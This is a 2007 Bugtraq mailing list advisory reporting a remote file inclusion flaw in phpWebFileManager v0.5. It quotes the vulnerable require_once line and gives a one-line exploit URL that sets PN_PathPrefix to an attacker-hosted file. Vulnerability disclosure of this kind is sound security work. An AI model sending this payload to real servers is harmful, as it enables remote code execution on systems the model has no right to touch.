Bugtraq mailing list archives
phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability
From: ilkerkandemir () mynet com
Date: 30 Jul 2007 19:10:33 -0000
------------------------------------------------------------------------------------------------------------------- MEFISTO PreSents... Script: phpWebFileManager v0.5 Script Download: http://platon.sk/projects/download.php?id=2 Contact: ilker Kandemir <ilkerkandemir[at]mynet.com> Code: require_once $PN_PathPrefix . 'functions.inc.php'; <<==== it's not defined ------------------------------------------------------------------------------------------------------------------- Exploit: index.php?PN_PathPrefix=http://attacker.txt? ------------------------------------------------------------------------------------------------------------------- Tnx:H0tturk,Ajann,Dumenci,Str0ke
Current thread:
- phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability ilkerkandemir (Jul 30)